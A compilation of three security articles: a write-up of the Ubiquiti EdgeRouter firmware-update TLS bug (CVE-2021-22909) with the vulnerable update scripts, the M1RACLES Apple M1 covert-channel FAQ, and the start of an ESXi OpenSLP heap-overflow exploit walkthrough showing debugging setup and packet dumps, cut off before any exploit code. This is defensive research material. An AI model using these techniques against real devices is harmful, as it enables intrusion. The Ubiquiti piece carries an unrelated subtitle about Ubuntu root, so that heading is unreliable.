CVE-2021-22909- DIGGING INTO A UBIQUITI FIRMWARE UPDATE BUG

How to get root on Ubuntu 20.04 by pretending nobody’s /home

Original text by Vincent Lee

Back In February, Ubiquiti released a new firmware update for the Ubiquiti EdgeRouter, fixing CVE-2021-22909/ZDI-21-601. The vulnerability lies in the firmware update procedure and allows a man-in-the-middle (MiTM) attacker to execute code as root on the device by serving a malicious firmware image when the system performs an automatic firmware update. The vulnerability was discovered and reported to the ZDI program by the researcher known as awxylitol.

This vulnerability may sound contrived; a bad actor gives bad firmware to the device and bad things happen. However, insecure download vulnerabilities have been the backbone of multiple Pwn2Own winning entries in the router category since its inception. The impact of this vulnerability is quite nuanced and worthy of further discussion.

How exactly does the router perform a firmware update?

According to Ubiquiti documentation, the new templated operational command add system image can be used to update the firmware of the router through the command line interface (CLI). A templated operational command allows the user to quickly modify the operational state of the router without fiddling with complex command-line parameters. This simplifies the process for day-to-day operations and minimizes user errors. I am sure we have all heard of horror stories of system administrators who accidentally deleted critical files, locked themselves out of equipment that is far away from civilization, and so forth. Templated commands attempt to mitigate these issues.

The templating system used by the Ubiquiti EdgeRouter is provided by the vyatta-op package. The command add system image is defined in the /opt/vyatta/share/vyatta-op/templates/add/system/image/node.def file.

$ cat node.def
help: Add a new image to the system
run: sudo /usr/sbin/ubnt-fw-latest —upgrade

view rawCVE-2021-22909-snippet-1.console hosted with ❤ by GitHub

By running this operational command, the user is effectively invoking the ubnt-fw-latest script with the --upgrade option. This option causes the ubnt-fw-latest script to run the upgrade_firmware() function, which will check with a Ubiquiti update server to get information about the latest firmware release, including the firmware download URLs.

#!/bin/bash
#——————————————————————————-
STATUS_FILE=»/var/run/fw-latest-status»
UPGRADING_FILE=»/var/run/upgrading»
REBOOT_NEEDED_FILE=»/var/run/needsareboot»
DOWNLOADING_FILE=»/var/run/downloading»
URL=»https://fw-update.ubnt.com/api/firmware-latest»
ACTION=»refresh»
CHANNEL=»release»
DEFAULT_URL=»https://localhost/eat/my/shorts.tar»
#——————————————————————————-
while [[ $# -gt 0 ]]
do
key=»$1″
case $key in
-r|—refresh) # Refresh status of latest firmware by
ACTION=»refresh» # fetching it from fw-update.ubnt.com
shift
;;
-s|—status) # Read latest firmware status from cache
ACTION=»status»
shift
;;
-u|—upgrade) # Upgrade to latest firmware
ACTION=»upgrade»
shift
;;
-c|—channel) # Target channel (release or public-beta)
CHANNEL=»$2″
shift
shift
;;
*) # Ignore unknown arguments
shift
;;
esac
done
# …
upgrade_firmware() {
# Fetch version number of latest firmware
echo -n «Fetching version number of latest firmware… «
refresh_status_file @> /dev/null
# Parse status file
local fw_version=`cat $STATUS_FILE | jq -r .version 2> /dev/null` || fw_version=»»
local fw_url=`cat $STATUS_FILE | jq -r .url 2> /dev/null` || fw_version=»»
local fw_md5=`cat $STATUS_FILE | jq -r .md5 2> /dev/null` || fw_version=»»
local fw_state=`cat $STATUS_FILE | jq -r .state 2> /dev/null` || fw_version=»»
if [ -z «$fw_version» ] || [ «$fw_url» = «$DEFAULT_URL» ]; then
echo «failed»
exit 42
else
echo «ok»
echo » > version : $fw_version»
echo » > url : $fw_url»
echo » > md5 : $fw_md5″
echo » > state : $fw_state»
echo
fi
if [ «$fw_state» == «can-upgrade» ]; then
echo «New firmware $fw_version is available»
echo
sudo /usr/bin/ubnt-upgrade —upgrade-force-prompt «$fw_url»
elif [ «$fw_state» == «up-to-date» ]; then
echo «Current firmware is already up-to-date (!!!)»
echo
sudo /usr/bin/ubnt-upgrade —upgrade-force-prompt «$fw_url»
elif [ «$fw_state» == «reboot-needed» ]; then
echo «Reboot is needed before upgrading to version $fw_version»
else
echo «Upgrade is already in progress»
fi
}
#——————————————————————————-
if [ «$ACTION» == «refresh» ]; then
refresh_status_file
elif [ «$ACTION» == «status» ]; then
read_status_file
elif [ «$ACTION» == «upgrade» ]; then
upgrade_firmware
fi

view rawCVE-2021-22909-snippet-2.bash hosted with ❤ by GitHub

The function proceeds to parse and compare the results from the server with the current firmware version. If an update is available, the script will invoke ubnt-upgrade to fetch the firmware from the fw-download.ubnt.com domain provided by the upgrade server. It will then perform the actual firmware upgrade.

The Bug — ZDI-21-601

The issue lies in the way the /usr/bin/ubnt-upgrade bash script downloads the firmware. The get_tar_by_url() function uses the curl command to perform the fetch. However, the developers specified the -k option (also known as the –insecure option), which disables certificate verification for TLS connections.

get_tar_by_url ()
{
mkdir $TMP_DIR
if [ «$NOPROMPT» -eq 0 ]; then
echo «Trying to get upgrade file from $TAR»
fi
if [ -n «$USERNAME» ]; then
auth=»-u $USERNAME:$PASSWORD»
else
auth=»»
fi
filename=»${TMP_DIR}/${TAR##*/}»
if [ «$NOPROMPT» -eq 0 ]; then
curl -k $auth -f -L -o $filename $TAR # <——
else
curl -k $auth -f -s -L -o $filename $TAR # <——
fi
if [ $? -ne 0 ]; then
echo «Unable to get upgrade file from $TAR»
rm -f $filename
rm -f $DOWNLOADING
exit 1
fi
if [ ! -e $filename ]; then
echo «Download of $TAR failed»
rm -f $DOWNLOADING
exit 1
fi
if [ «$NOPROMPT» -eq 0 ]; then
echo «Download succeeded»
fi
TAR=$filename
}

view rawCVE-2021-22909-snippet-3.bash hosted with ❤ by GitHub

Since /usr/sbin/ubnt-upgrade does not check for the validity of the certificate, an attacker can use a self-signed certificate to spoof the fw-download.ubnt.com domain without triggering any warnings or complaints on the device to alert the user. This vulnerability significantly reduces the skill barrier needed to launch a successful attack.

To exploit this vulnerability, the attacker can modify an existing EdgeRouter firmware image and fix up the checksum contained in the file. In the submitted proof-of-concept, the researcher modified the rc.local file to connect back to the attacker with a reverse shell. A reboot is part of the upgrade process, triggering the rc.local script.

Conclusion

If an attacker inserts themselves as MiTM, they can then impersonate the `fw-download.ubnt.com` domain controlled by Ubiquiti. However, to successfully serve up malicious firmware from this domain, the attackers would normally need to obtain a valid certificate with private key for the domain. To proceed, the attackers would probably need to hack into Ubiquiti or convince a trusted certificate authority (CA) to issue the attackers a certificate for the Ubiquiti domain, which is no insignificant feat. However, due to this bug, there is no need to obtain the certificate.

The heart of the problem is the lack of authentication on the firmware binary. The function of a secure communications channel is to provide confidentiality, integrity, and authentication. In TLS, encryption provides confidentiality, a message digest (or AEAD in the case of TLS 1.3) provides integrity, and certificate verification provides authentication. Without the verification of certificates, clients are foregoing authentication in the communications channel. In this scenario, it is possible for the client to be speaking to a malicious actor “securely”, as it were.

It should also be noted how checksums are not replacements for cryptographic signatures. Checksums can help to detect random errors in transmission but do not provide hard proof of data authenticity.

One final consideration is the possibility that a vendor’s website could become compromised. In that case, the firmware along with its associated hash could both be replaced with malicious versions. This situation can be mitigated only by applying a cryptographic signature to the firmware file itself. Perhaps Ubiquity will make the switch to signing their firmware binaries cryptographically, which would improve the overall security of its customers.

Ubiquity addressed this bug in their v2.0.9-hotfix.1 security update by removing the -k (--insecure) flag from the templated command.

This was the first submission to the program from awxylitol, and we hope to see more research from them in the future. Until then, you can find me on Twitter @TrendyTofu, and follow the team for the latest in exploit techniques and security patches.

Footnote

Cautious users of the EdgeRouter seeking advice on how to upgrade the device properly should avoid the use of automatic upgrade feature for this update. They may want to download the firmware file manually from a browser and verify the hashes of the firmware before performing a manual upgrade by uploading the firmware file to the device through the web interface.

M1ssing Register Access Controls Leak EL0 State

M1RACLES (CVE-2021-30747) is a covert channel vulnerability in the Apple Silicon “M1” chip.

Original text by marcan

M1ssing Register Access Controls Leak EL0 State

M1RACLES (CVE-2021-30747) is a covert channel vulnerability in the Apple Silicon “M1” chip.

Executive Summary

A flaw in the design of the Apple Silicon “M1” chip allows any two applications running under an OS to covertly exchange data between them, without using memory, sockets, files, or any other normal operating system features. This works between processes running as different users and under different privilege levels, creating a covert channel for surreptitious data exchange.

The vulnerability is baked into Apple Silicon chips, and cannot be fixed without a new silicon revision.

Demo video

Watch video piped in real time through the covert channel!

\

Technical Details

The ARM system register encoded as s3_5_c15_c10_1 is accessible from EL0, and contains two implemented bits that can be read or written (bits 0 and 1). This is a per-cluster register that can be simultaneously accessed by all cores in a cluster. This makes it a two-bit covert channel that any arbitrary process can use to exchange data with another cooperating process. A demo app to access this register is available here.

A malicious pair of cooperating processes may build a robust channel out of this two-bit state, by using a clock-and-data protocol (e.g. one side writes 1x to send data, the other side writes 00 to request the next bit). This allows the processes to exchange an arbitrary amount of data, bound only by CPU overhead. CPU core affinity APIs can be used to ensure that both processes are scheduled on the same CPU core cluster. A PoC demonstrating this approach to achieve high-speed, robust data transfer is available here. This approach, without much optimization, can achieve transfer rates of over 1MB/s (less with data redundancy).

The original purpose of this register is unknown, but it is not believed to have been made accessible to EL0 intentionally, thus making this a silicon errata.

FAQ

Who is affected?

All Apple M1 users, running any operating system on bare metal.

Am I affected?

Probably.

  • macOS users: At least versions 11.0 and onwards are affected.
  • Linux users: Versions 5.13 and onwards are affected.
  • OpenBSD users: Hi Mark!
  • AmigaOS users: Look, Apple bought PASemi but the AmigaOne X1000 CPU doesn’t count as Apple Silicon, sorry.
  • Newton OS users: I guess those are technically Apple Silicon but…
  • iOS users: See below

Are other Apple CPUs affected?

Maybe, but I don’t have an iPhone or a DTK to test it. Feel free to report back if you try it. The A14 has been confirmed as also affected, which is expected, as it is a close relative of the M1.

Are non-Apple CPUs affected?

No.

Are VMs affected?

No. Correctly implemented hypervisors should disable guest accesses to this register by default, and this feature works correctly on the M1, which mitigates the issue. Both Hypervisor.framework (on macOS) and KVM (on Linux) do this, and are not affected.

How can I protect myself?

The only mitigation available to users is to run your entire OS as a VM.

Does the mitigation have a performance impact?

Yes, running your entire OS as a VM has a performance impact.

That sounds bad.

Well, yeah. Don’t do that, it’d be silly.

Is there really no other way?

Mitigating this under macOS properly would require turning its entire VM hypervisor framework design on its head. We are not aware of any plans by Apple to do so at this time.

It’s a bit easier on Linux, but it still requires fairly intrusive changes due to the design of the M1, and comes at a performance cost for guest VMs. We’re not in a huge rush to do this. Sorry.

How was this bug found?

I was working on figuring out how the M1 CPU works to port Linux to it. Not understanding Apple proprietary features could lead to this sort of vulnerability. I found something, and it turned out to be an Apple proprietary bug, instead of an Apple proprietary feature, that they themselves also weren’t aware of.

How was this bug disclosed?

I e-mailed product-security@apple.com. They acknowledged the vulnerability and assigned it CVE-2021-30747. I published this disclosure 90 days after the initial disclosure to Apple.

Was this responsibly disclosed?

I tried, but I also talked about it on public IRC before I knew it was a bug and not a feature, so I couldn’t do much about that part. ¯\_(ツ)_/¯

Is the vulnerability fixed in future Apple Silicon chips?

We do not have information on Apple’s plans for silicon mitigations. An educated guess based on silicon design timelines would be that the flaw will likely affect the next generation of Apple Silicon after M1, but might be fixed in the subsequent one.

Can malware use this vulnerability to take over my computer?

No.

Can malware use this vulnerability to steal my private information?

No.

Can malware use this vulnerability to rickroll me?

Yes. I mean, it could also rickroll you without using it.

Can this be exploited from Javascript on a website?

No.

Can this be exploited from Java apps?

Wait, people still use Java?

Can this be exploited from Flash applets?

Please stop.

Can I catch BadBIOS from this vulnerability?

No.

Wait, is this even real?

It is.

So what’s the real danger?

If you already have malware on your computer, that malware can communicate with other malware on your computer in an unexpected way.

Chances are it could communicate in plenty of expected ways anyway.

That doesn’t sound too bad.

Honestly, I would expect advertising companies to try to abuse this kind of thing for cross-app tracking, more than criminals. Apple could catch them if they tried, though, for App Store apps (see below).

Wait. Oh no. Some game developer somewhere is going to try to use this as a synchronization primitive, aren’t they. Please don’t. The world has enough cursed code already. Don’t do it. Stop it. Noooooooooooooooo

What about iOS?

iOS is affected, like all other OSes. There are unique privacy implications to this vulnerability on iOS, as it could be used to bypass some of its stricter privacy protections. For example, keyboard apps are not allowed to access the internet, for privacy reasons. A malicious keyboard app could use this vulnerability to send text that the user types to another malicious app, which could then send it to the internet.

However, since iOS apps distributed through the App Store are not allowed to build code at runtime (JIT), Apple can automatically scan them at submission time and reliably detect any attempts to exploit this vulnerability using static analysis (which they already use). We do not have further information on whether Apple is planning to deploy these checks (or whether they have already done so), but they are aware of the potential issue and it would be reasonable to expect they will. It is even possible that the existing automated analysis already rejects any attempts to use system registers directly.

What about APTs?

They have better exploits anyway. They don’t care.

So you’re telling me I shouldn’t worry?

Yes.

What, really?

Really, nobody’s going to actually find a nefarious use for this flaw in practical circumstances. Besides, there are already a million side channels you can use for cooperative cross-process communication (e.g. cache stuff), on every system. Covert channels can’t leak data from uncooperative apps or systems.

Actually, that one’s worth repeating: Covert channels are completely useless unless your system is already compromised.

So how is this a vulnerability if you can’t exploit it?

It violates the OS security model. You’re not supposed to be able to send data from one process to another secretly. And even if harmless in this case, you’re not supposed to be able to write to random CPU system registers from userspace either.

It was fairly lucky that the bug can be mitigated in VMs (as the register still responds to VM-related access controls); had this not been the case, the impact would have been more severe.

How did this happen anyway?

Someone in Apple’s silicon design team made a boo-boo. It happens. Engineers are human.

But Bloomberg says China hacked TSMC and put this in?!

Good time to buy TSMC stock then!*

* This site is for informational purposes only and is not intended to be a solicitation, offering or recommendation of any security, commodity, derivative, investment management service or advisory service and is not commodity trading advice. This site does not intend to provide investment, tax or legal advice on either a general basis or specific to any client accounts or portfolios. This website does not represent that the securities, products, or services discussed on this site are suitable or appropriate for any or all investors.

Wait, didn’t you say on Twitter that this could be mitigated really easily?

Yeah, but originally I thought the register was per-core. If it were, then you could just wipe it on context switches. But since it’s per-cluster, sadly, we’re kind of screwed, since you can do cross-core communication without going into the kernel. Other than running in EL1/0 with TGE=0 (i.e. inside a VM guest), there’s no known way to block it.

Can’t the OS just write garbage to the register to break apps using it?

No. It would have to do it so fast that it would peg a CPU core continuously, and you’d still get data through even with such noise. Lowering the signal-to-noise ratio almost never works for covert channels, and this case is particularly futile due to its high bandwidth.

Aren’t bugs like this rare and critical?

No, all CPUs have silly errata like this, you just don’t hear about it most of the time. Some vendors even occassionally hide some of these errata and don’t disclose them properly, because it makes them look bad. I hear some of them rhyme with “doorbell”.

But I’ve only heard about Spectre and Meltdown and…?

Because those are the ones that the discoverers chose to hype up. To be fair, those were kind of bad.

So what’s the point of this website?

Poking fun at how ridiculous infosec clickbait vulnerability reporting has become lately. Just because it has a flashy website or it makes the news doesn’t mean you need to care.

If you’ve read all the way to here, congratulations! You’re one of the rare people who doesn’t just retweet based on the page title 🙂

But how are journalists supposed to know which bugs are bad and which bugs aren’t?

Talk to people. In particular, talk to people other than the people who discovered the bug. The latter may or may not be honest about the real impact.

If you hear the words “covert channel”… it’s probably overhyped. Most of these come from paper mills who are endlessly recycling the same concept with approximately zero practical security impact. The titles are usually clickbait, and sometimes downright deceptive.

I came here from a news site and they didn’t tell me any of this at all!

Then perhaps you should stop reading that news site, just like they stopped reading this site after the first 2 paragraphs.

Are all news sites bad?

Nah, a few actually contacted me before running stories and got the facts and did a good job.

If this bug doesn’t matter, why did you go through all the trouble of putting this site and the demo together?

Honestly, I just wanted to play Bad Apple!! over an M1 vulnerability. You have to admit that’s kind of cool.

Can you go into more details about the possible mitigations and why you can’t just fix this in, like, 5 lines of code?

Sure. ARMv8 was originally designed to support Type 1 hypervisors. That’s like Xen for you x86 people: a small hypervisor (EL2) runs both the “host” OS and the “guest” OSes under it (EL1). Later, it was extended to support Type 2 hypervisors (“Virtualization Host Extensions”). That’s like KVM for you x86 people: the hypervisor is the host OS and both run at EL2.

Mitigating the problem requires running your OS at EL1, where the problem register can be disabled, and then having at least some kind of minimal hypervisor at EL2 to deal with those traps (otherwise running an app that uses the register would just crash your machine instead).

The macOS virtualization framework only supports running as a Type 2 hypervisor. So, to fix this, they’d have to re-design the entire thing to work as a Type 1 hypervisor.

Linux supports both modes, where KVM on ARMv8 can run as a little Type 1 hypervisor built into the OS, or as a Type 2 hypervisor like on x86. Running in Type 1 mode (“non-VHE”) would make mitigating the vulnerability possible. However, in their infinite wisdom, Apple decided to only support Type 2 (VHE) mode on Apple Silicon chips, in violation of the ARM architecture specification which requires Type 1 support (non-VHE). So you can’t actually run Linux in Type 1 mode on Apple Silicon. In fact, we had to patch Linux to work around this violation of the spec, because on every other ARM chip, it’ll always start in non-VHE mode and only switch to VHE mode later.

Nothing actually stops you from making a Type 1 hypervisor work in VHE mode (VHE mode adds features required to run as Type 2, but doesn’t remove anything), so it is possible to do Type 1 virtualization on Apple Silicon and work around this. However, because VHE mode changes the way virtualization works, Type 1 hypervisors meant to work in non-VHE mode won’t work in VHE mode without changes. So Linux would need a bunch of rework of its non-VHE Type 1 code to make it possible to use in VHE mode, where it was never intended to work because the ARM specification requires non-VHE mode to always be available.

Basically, Apple decided to break the ARM spec by removing a mandatory feature, because they figured they’d never need to use that feature for macOS. And then it turned out that removing that feature made it much harder for existing OSes to mitigate this vulnerability. Yay.

If you want to play around with this, you should know that setting the Apple-proprietary register bit HACR_EL2[48] to 1 will make accesses to the problem register (and a few others) trap to EL2, but only when running in VHE guest mode (with HCR_EL2.TGE = 0). They won’t trap in EL2/EL0 (VHE host) mode.

Who are you, anyway?

Hi!

Any closing thoughts?

If you want to help me work on porting and upstreaming Linux for Apple Silicon, I have a Patreon and a GitHub Sponsors. I promise most of the time I’m working on Linux, not writing silly vulnerability PoCs! 🙂

Follow our Linux port progress at asahilinux.org! If you enjoyed the technical part of this PoC, you will probably enjoy our first progress report.

Oh yeah, this vulnerability was found using m1n1. It’s cool, you should check it out! I’m also turning it into a minimal hypervisor to investigate macOS’s usage of the M1 hardware… but thanks to this bug being mitigated by VMs, that will also turn m1n1 into a (somewhat) practical mitigation for this bug, without the overhead of a “full” VM. You lose virtualization features in the guest OS, though, as the M1 does not support nested virtualization.

My RCE PoC walkthrough for (CVE-2021–21974) VMware ESXi OpenSLP heap-overflow vulnerability

My RCE PoC walkthrough for (CVE-2021–21974) VMware ESXi OpenSLP heap-overflow vulnerability

Original text by Johnny Yu (@straight_blast)

During a recent engagement, I discovered a machine that is running VMware ESXi 6.7.0. Upon inspecting any known vulnerabilities associated with this version of the software, I identified it may be vulnerable to ESXi OpenSLP heap-overflow (CVE-2021–21974). Through googling, I found a blog post by Lucas Leong (@_wmliang_) of Trend Micro’s Zero Day Initiative, who is the security researcher that found this bug. Lucas wrote a brief overview on how to exploit the vulnerability but share no reference to a PoC. Since I couldn’t find any existing PoC on the internet, I thought it would be neat to develop an exploit based on Lucas’ approach. Before proceeding, I highly encourage fellow readers to review Lucas’ blog to get an overview of the bug and exploitation strategy from the founder’s perspective.

Setup

To setup a test environment, I need a vulnerable copy of VMware ESXi for testing and debugging. VMware offers trial version of ESXi for download. Setup is straight forward by deploying the image through VMware Fusion or similar tool. Once installation is completed, I used the web interface to enable SSH. To debug the ‘slpd’ binary on the server, I used gdbserver that comes with the image. To talk to the gdbserver, I used SSH local port forwarding:

ssh -L 1337:localhost:1337 root@<esxi-ip-address> 22

On the ESXi server, I attached gdbserver to ‘slpd’ as follow:

/etc/init.d/slpd restart ; sleep 1 ; gdbserver — attach localhost:1337 `ps | grep slpd | awk ‘{print $1}’`

Lastly, on my local gdb client, I connected to the gdbserver with the following command:

target remote localhost:1337

Service Location Protocol

The Service Location Protocol is a service discovery protocol that allows connecting devices to identify services that are available within the local area network by querying a directory server. This is similar to a person walking into a shopping center and looking at the directory listing to see what stores is in the mall. To keep this brief, a device can query about a service and its location by making a ‘service request’ and specifying the type of service it wants to look up with an URL.

For example, to look up the VMInfrastructure service from the directory server, the device will make a request with ‘service:VMwareInfrastructure’ as the URL. The server will respond back with something like ‘service:VMwareInfrastructure://localhost.localdomain’.

A device can also collect additional attributes and meta-data about a service by making an ‘attribute request’ supplying the same URL. Devices that want to be added to the directory can submit a ‘service registration’. This request will include information such as the IP of the device that is making the announcement, the type of service, and any meta-data that it wants to share. There are more functions the SLP can do, but the last message type I am interested in is the ‘directory agent advertisement’ because this is where the vulnerability is at. The ‘directory agent advertisement’ is a broadcast message sent by the server to let devices on the network know who to reach out if they wanted to query about a service and its location. To learn more about SLP, please see this and that.

SLP Packet Structure

While the layout of the SLP structure will be slightly different between different SLP message types, they generally follow a header + body format.

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       Service Location header (function = SrvRqst = 1)        |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      length of <PRList>       |        <PRList> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   length of <service-type>    |    <service-type> String      \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    length of <scope-list>     |     <scope-list> String       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of predicate string   |  Service Request <predicate>  \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of <SLP SPI> string   |       <SLP SPI> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.1)

[SLP Client-1] connect

Header:  bytearray(b'\x02\x01\x00\x00=\x00\x00\x00\x00\x00\x00\x05\x00\x02en')
Body:  bytearray(b'\x00\x00\x00\x1cservice:VMwareInfrastructure\x00\x07DEFAULT\x00\x00\x00\x00')

length of <PRList>:  0x0000
<PRList> String:  b''
length of <service-type>:  0x001c
<service-type> string:  b'service:VMwareInfrastructure'
length of <scope-list>:  0x0007
<scope-list> string:  b'DEFAULT'
length of predicate string:  0x0000
Service Request <predicate>:  b''
length of <SLP SPI> string:  0x0000
<SLP SPI> String:  b''

[SLP Client-1] service request
[SLP Client-1] recv:  b'\x02\x02\x00\x00N\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x00\x00\x00\x01\x00\xff\xff\x004service:VMwareInfrastructure://localhost.localdomain\x00'

A ‘service registration’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       Service Location header (function = AttrRqst = 6)       |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       length of PRList        |        <PRList> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         length of URL         |              URL              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    length of <scope-list>     |      <scope-list> string      \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of <tag-list> string  |       <tag-list> string       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   length of <SLP SPI> string  |        <SLP SPI> string       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-10.3)
  
[SLP Client-1] connect
 
Header:  bytearray(b'\x02\x06\x00\x00=\x00\x00\x00\x00\x00\x00\x0c\x00\x02en')
Body:  bytearray(b'\x00\x00\x00\x1cservice:VMwareInfrastructure\x00\x07DEFAULT\x00\x00\x00\x00')

length of PRList:  0x0000
<PRList> String:  b''
length of URL:  0x001c
URL:  b'service:VMwareInfrastructure'
length of <scope-list>:  0x0007
<scope-list> string:  b'DEFAULT'
length of <tag-list> string:  0x0000
<tag-list> string:  b''
length of <SLP SPI> string:  0x0000
<SLP SPI> string:  b''

[SLP Client-1] attribute request
[SLP Client-1] recv:  b'\x02\x07\x00\x00w\x00\x00\x00\x00\x00\x00\x0c\x00\x02en\x00\x00\x00b(product="VMware ESXi 6.7.0 build-14320388"),(hardwareUuid="23F14D56-C9F4-64FF-C6CE-8B0364D5B2D9")\x00' 

Lastly, a ‘directory agent advertisement’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         Service Location header (function = SrvReg = 3)       |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                          <URL-Entry>                          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | length of service type string |        <service-type>         \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     length of <scope-list>    |         <scope-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of attr-list string   |          <attr-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |# of AttrAuths |(if present) Attribute Authentication Blocks...\
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.3)
 
      URL Entries
      
      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   Reserved    |          Lifetime             |   URL Length  |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |URL len, contd.|            URL (variable length)              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |# of URL auths |            Auth. blocks (if any)              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-4.3)
  
[SLP Client-1] connect

Header:  bytearray(b'\x02\x03\x00\x003\x00\x00\x00\x00\x00\x00\x14\x00\x02en')
Body:  bytearray(b'\x00\x00x\x00\t127.0.0.1\x00\x00\x0bservice:AAA\x00\x07default\x00\x03BBB\x00')

<URL-Entry>: 

   Reserved:  0x00
   Lifetime:  0x0078
   URL Length:  0x0009
   URL (variable length):  b'127.0.0.1'
   # of URL auths:  0x00
   Auth. blocks (if any):  b''
   
length of service type string:  0x000b
<service-type>:  b'service:AAA'
length of <scope-list>:  0x0007
<scope-list>:  b'default'
length of attr-list string:  0x0003
<attr-list>:  b'BBB'
# of AttrAuths:  0x00
(if present) Attribute Authentication Blocks...:  b''

[SLP Client-1] service registration
[SLP Client-1] recv:  b'\x02\x05\x00\x00\x12\x00\x00\x00\x00\x00\x00\x14\x00\x02en\x00\x00'

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Service Location header (function = DAAdvert = 8)      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |          Error Code           |  DA Stateless Boot Timestamp  |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |DA Stateless Boot Time,, contd.|         Length of URL         |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     \                              URL                              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Length of <scope-list>    |         <scope-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Length of <attr-list>     |          <attr-list>          \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    Length of <SLP SPI List>   |     <SLP SPI List> String     \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | # Auth Blocks |         Authentication block (if any)         \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.5)

[SLP Client-1] connect

Header:  bytearray(b'\x02\x08\x00\x00N\x00\x00\x00\x00\x00\x00\x00\x00\x02en')
